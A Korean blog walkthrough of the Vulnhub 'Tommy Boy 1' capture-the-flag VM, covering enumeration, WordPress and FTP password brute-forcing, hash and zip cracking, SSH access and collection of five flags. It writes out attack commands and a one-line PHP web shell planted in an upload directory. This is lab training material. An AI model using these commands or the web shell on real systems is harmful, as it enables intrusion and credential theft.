https://www.vulnhub.com/entry/tommy-boy-1,157/
Reconnaissance
└─$ sudo nmap -sn 192.168.45.0/24
Nmap scan report for 192.168.45.124
Host is up (0.00036s latency).
MAC Address: 08:00:27:C0:50:B6 (Oracle VirtualBox virtual NIC)
이번엔 웹 해킹이 위주일 것 같은 느낌입니다
HTTP - 80, 8008
우선 80부터 접속해봅니다
시스템에 에러가 났다고 합니다. Nick..
페이지 소스에 주석 표시되어있는 정보 입니다.
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal. Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget? Thanks-->
백업은 톰의 홈디렉터리에 되어있고, 톰이 뭔가 중요한 정보를 회사 블로그에 저장하고 있다네요
그리고 크게 싸웟을때의 장소 이름을 따서 디렉터리를 만들었다는데, 유튜브 링크도 있네요
유튜브 동영상에서 확인한 장소입니다.
/prehistoricforest
계속 /robots.txt 를 확인해봅니다
다들 디렉터리에 사진이 들어있고, 별다른 특이사항은 없습니다
그리고 첫번째 플래그입니다. 5개가 있다고하네요
1/5 - B34rcl4ws
이번엔 8008포트로 접속해봅니다
일단 8008포트의 웹사이트에서는 별다른 특이사항 없습니다
Vulnerability
우선 gobuster 툴을 이용한 디렉터리 브루트포싱과 nikto를 이용한 잠재적 취약점 진단 부터 실시합니다
80
디렉터리 브루트 포싱을 진행했을때 200 응답만 출력한 이유가 워드리스트 파일에서 브루트포싱을 하면 전부다 301 에러가 발생하여 표출됬는데, nikto에서도 동일한 결과가 나왔습니다. 그래서 직접 접속해보니.
다들 이런식으로 디렉터리가 생성되어있네요
그렇다면 이전에 얻었던 단서 /prehistoricforest 경로를 우선 들어가봅니다
오호 wordpress로 구성된 callahan 직원 블로그입니다
wpscan을 이용해서 유저 정보 획득 해주고 블로그를 한번 살펴봅니
#username
tommy
richard
tom
Tom Jr.
Big Tom
michelle
그리고 아까 블로그에 뭔가 중요한 정보를 많이 입력한다고 했었죠? 그리고 /richard 디렉터리에 있는게 뭔가 기억을 되살려줄거랍니다... 그럼 다운 받아서 확인해봅니다
2/5 - Z4l1nsky
strings 명령어를 입력해서 보니 수상해 보이는 것이 있죠?
암호화 되어있는거같으니 한번 확인 후에 풀어봅시다 이번엔 hashcat을 이용해봤습니다
└─$ hashcat -m 0 -a 0 -O hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ce154b5a8e59c89732bc25d6a2e6b90b:spanky
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: ce154b5a8e59c89732bc25d6a2e6b90b
Time.Started.....: Wed Jul 17 17:49:49 2024 (1 sec)
Time.Estimated...: Wed Jul 17 17:49:50 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 313.3 kH/s (0.27ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1536/14344385 (0.01%)
Rejected.........: 0/1536 (0.00%)
Restore.Point....: 1024/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: kucing -> mexico1
Hardware.Mon.#1..: Util: 60%
ce154b5a8e59c89732bc25d6a2e6b90b:spanky
Michelle/Tommy,
This is f’d up.
I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:
Hey Richy,
So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.
Here’s everything I know:
You guys are all hopeless sheep :-/
The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.
I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).
You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.
Good luck, schmucks!
LOL
-Nick
Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!
-Richard
음... 일단 Big Tom 계정으로 SSH를 이용해야한다.
Nick의 홈디렉터리에는 다른 정보 들이 존재한다.
callahanbak.bak이라는 백업 파일을 index.html로 바꿔주면 정상적으로 동작이 될 것이다
불안정한 FTP 서버가 있는데, 매시 정각에 15분 사용가능, 15분동안 오프라인 상태이다
그리고 nickburns의 계정은 아주 쉽게 리셋했다...
wpscan을 다시 이용해서 비밀번호 브루트포싱 공격을 진행합니다
└─$ wpscan --url http://192.168.45.124/prehistoricforest/ -U wp_user.txt -P /usr/share/wordlists/rockyou.txt
Exploitation
tom 유저로 접속을 해봅니다
들어가자마자 Drafts에 있는 password 라는 글이 있습니다
# Credentials
tom(?):1938!!
tom의 비밀번호는 획득했는데, 이전에 편지에 보면 유저네임이 실제 사용하는 이름과 다르다는 말이 있었습니다
그렇다면,, 다른 방법으로는 ftp를 활용하는 방법인데, nmap을 이용해서 포트 스캐닝을 다시 해줍니다
65534 포트인가보네요
간단한 비밀번호를 사용한다고 했으니, 리스트 하나 작성해봅니다
└─$ cat ftp_pw.txt
password
pass
password123!
nick
nickburns
이후 hydra를 이용해 비밀번호 스프레잉 공격을 진행합니다
시간이 얼마 없어요!!
# Credentials
nickburns:nickburns
└─$ ftp 192.168.45.124 65534
Connected to 192.168.45.124.
220 Callahan_FTP_Server 1.3.5
Name (192.168.45.124:kali): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||26591|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||43711|)
150 Opening BINARY mode data connection for readme.txt (977 bytes)
100% |****************************************************************************************************************| 977 16.13 KiB/s 00:00 ETA
226 Transfer complete
977 bytes received in 00:00 (15.67 KiB/s)
└─$ cat readme.txt
To my replacement:
If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!
Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.
Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what?
He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.
Good luck, schmuck!
LOL.
-Nick
NickIzL33t이라는 디렉터리가 서버 어딘가에 있고, Big Tom이 비밀번호를 항상 까먹어서 encrypted.zip 파일로 압축을 해놓았다고 합니다
여전한데요...
스티브 잡스 얘기를 하는거보니 프록시 도구를 이용해서 User-Agent를 IOS로 변경해서 진행해봅니다
ㅋㅋ킼 html 확장자로 찾아보라는 단서만 발견했습니다
그래서 뭔가 찾아야하는데 user-agent를 변경하는 옵션이 있는 ffuf 툴을 이용해봅니다
└─$ ffuf -u http://192.168.45.124:8008/NickIzL33t/FUZZ.html -w /usr/share/wordlists/rockyou.txt -H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like M
ac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3"
...
#1shorty [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 7ms]
#1monkey [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 0ms]
#1nigga [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 13ms]
#1babygurl [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 23ms]
fallon1 [Status: 200, Size: 459, Words: 56, Lines: 13, Duration: 38ms]
#1balla [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 6ms]
#1mother [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 13ms]
#1freak [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 13ms]
#1playa [Status: 200, Size: 270, Words: 29, Lines: 10, Duration: 16ms]
....
혼자 다른아이가 하나 있죠?
이제 거의 모든 힌트를 다줬네요
Big Tom,
Your password vault is protected with (yep, you guessed it) a PASSWORD!
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!
Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:
* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters
Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one
big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny.
LOL
-Nick
3/5 - TinyHead
압축을 풀기위해서 비밀번호가 있어야하고 그 힌트는 위의 편지에 있습니다
└─$ unzip t0msp4ssw0rdz.zip
Archive: t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
톰의 아내의 별명인 bev
대문자 1개,
소문자 2개,
숫자 2개,
기호 1개,
그리고 Tommy boy가 출시된 연도가 포함된다고 합니다 -> 1995년 입니다
└─$ crunch 13 13 -t bev,%%@@^1995 -o unzip_pw.txt
비밀번호 리스트를 만들었고, zip 파일의 비밀번호를 해독하기 위해 fcrackzip 이라는 툴을 사용해보겠습니다
툴을 사용하고 있을때 다시 한번 지금 하고 있는것에 대한 생각을 해보자면,
Big Tom 으로 SSH로 접속을 해야하는데, 비밀번호는 워드프레스에서 획득을 했지만 규칙적인 유저 이름으로 생성하지 않아 블로그와 다른 이름으로 유저가 생성되어 있어서 현재 그 유저네임을 찾고 있습니다
# Credentials
tom(?):1938!!
└─$ fcrackzip -v -u -D -p unzip_pw.txt ./t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc 332/ 641, flags 9, chk 9aad)
checking pw bevG72kn~1995
PASSWORD FOUND!!!!: pw == bevH00tr$1995
└─$ unzip t0msp4ssw0rdz.zip
Archive: t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
inflating: passwords.txt
┌──(kali㉿kali)-[~/vulnhub/tommyboy]
└─$ cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money
TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.
Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
제가 알아야할 것은 Auto Server의 Username 입니다
1938!!과 병합해서 SSH 접속을 해봅니다
bigtommysenior:fatguyinalittlecoat1938!!
대상 호스트 초기 침투 완료
드디어 Big Tom,,장악 완료
Post-Exploitation
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.
Flag data: EditButton
But...but...where's flag 5?
I'll make it easy on you. It's in the root of this server at /5.txt
4/5 - EditButton
5번째 플래그는 /5.txt 랍니다
일단 이전에 백업파일을 /var/www/html/index.html로 변경하면 정상적으로 웹사이트가 운영된다고 했는데요 한번 해보겠습니다
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ ls -al /var/www/html/index.html
-rw-r--r-- 1 bigtommysenior bigtommysenior 1176 Jul 8 2016 /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
웹 사이트는 정상적으로 돌아왔는데,,음,, 뭔가 대상호스트에서 사용할만한 파일이나 디렉터리나 무언가를 찾아야겠네요
bigtommysenior@CallahanAutoSrv01:~$ find / -perm -222 -type d 2> /dev/null
/var/lib/php/sessions
/var/crash
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
/var/tmp
/dev/mqueue
/dev/shm
/run/lock
/tmp
/tmp/.XIM-unix
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.X11-unix
제가 사용할 수 있는 디렉터리이니,, php로 원라이너 쉘을 하나 만들어 줍니다
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ echo '<?php system($_GET['c']); ?>' > one.php
사용할 수 있는 디렉터리를 찾으므로써 Remote Code Execution 까지 가능케 했습니다
5/5 - Buttcrack
플래그 5개를 모두 합쳐서,,, 마지막 남은 파일을 열어봐야겠습니다
B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
네...정말 머리가 아프네요,,,ㅋㅋㅋ
'Vulnhub' 카테고리의 다른 글
[Vulnhub] Breach: 2 Walkthrough (4) | 2024.07.23 |
---|---|
[Vulnhub] Brearch Walkthrough (6) | 2024.07.22 |
[Vulnhub] RickdiculouslyEasy Walkthrough (1) | 2024.07.16 |
[Vulnhub] DerpNStink Walkthrough (1) | 2024.07.15 |
[Vulnhub] EVM Walkthrough (0) | 2024.07.12 |